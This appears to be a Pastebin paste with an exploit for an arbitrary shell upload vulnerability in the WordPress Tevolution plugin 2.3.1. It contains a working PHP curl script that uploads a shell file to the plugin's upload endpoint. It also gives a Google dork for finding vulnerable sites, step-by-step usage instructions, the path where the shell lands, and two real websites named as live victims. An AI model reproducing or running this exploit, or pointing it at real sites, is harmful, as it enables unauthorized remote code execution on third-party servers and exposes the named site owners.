API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Apr 30th, 2017
116
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.08 KB | None | 0 0
raw download clone embed print report
  1. ######################
  2. # Exploit Title : Wordpress Tevolution Plugin 2.3.1 Arbitrary Shell Upload Vulnerability
  3. # Exploit Author : xBADGIRL21
  4. # Dork : inurl:/wp-content/plugins/Tevolution/tmplconnector
  5. # Vendor Homepage : https://templatic.com/
  6. # version : 2.3.1
  7. # Tested on: [ BackBox ]
  8. # skype:xbadgirl21
  9. # Date: 15/08/2016
  10. # video Proof : https://youtu.be/eVjW6rnaoSY
  11. ######################
  12. # [+] DESCRIPTION :
  13. ######################
  14. # [+] The Tevolution WordPress plugin enables advanced functionality in our themes.
  15. # [+] Some of the features it enables include custom post types, monetization options, custom fieldsa|
  16. # [+] An arbitrary shell upload web vulnerability has been detected in the Tevolution Plugin 2.3.1 and below.
  17. # [+] The vulnerability allows remote attackers to upload arbitrary files within the wordpress upload directory
  18. ######################
  19. # [+] USAGE :
  20. ######################
  21. # 1.- Download or Copy the Exploit C0des
  22. # 2.- Use Dork and Choose One Of the Website
  23. # 3.- Edit The Script
  24. # 4.- Upload Your File : shell.php.jpg or shell.php.txt
  25. ######################
  26. # [+] Exploit:
  27. ######################
  28. <?php
  29. $uploadfile="roy.php.txt";
  30. $ch = curl_init("
  31. http://127.0.0.1/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php
  32. ");
  33. curl_setopt($ch, CURLOPT_POST, true);
  34. curl_setopt($ch, CURLOPT_POSTFIELDS,
  35. array('file'=>"@$uploadfile"));
  36. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  37. $postResult = curl_exec($ch);
  38. curl_close($ch);
  39. print "$postResult";
  40. ?>
  41. ######################
  42. # [+] Dev!l Path :
  43. ######################
  44. #
  45. http(s)://<wp-host>/<wp-path>/wp-content/themes/Directory/images/tmp/roy.php.txt
  46. ######################
  47. # [+] Live Demo :
  48. ######################
  49. # http://guiagronicaragua.com
  50. # http://eventsinsuriname.com
  51. ######################
  52. # Discovered by : xBADGIRL21 - Unkn0wN
  53. # Greetz : All Mauritanien Hackers - NoWhere
  54. #######################
  55. ### Note ### : This Exploit Been Discovered By Someone iKnow but he Don't
  56. # so I Just Write the Exploit C0des ...........
  57. #######################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!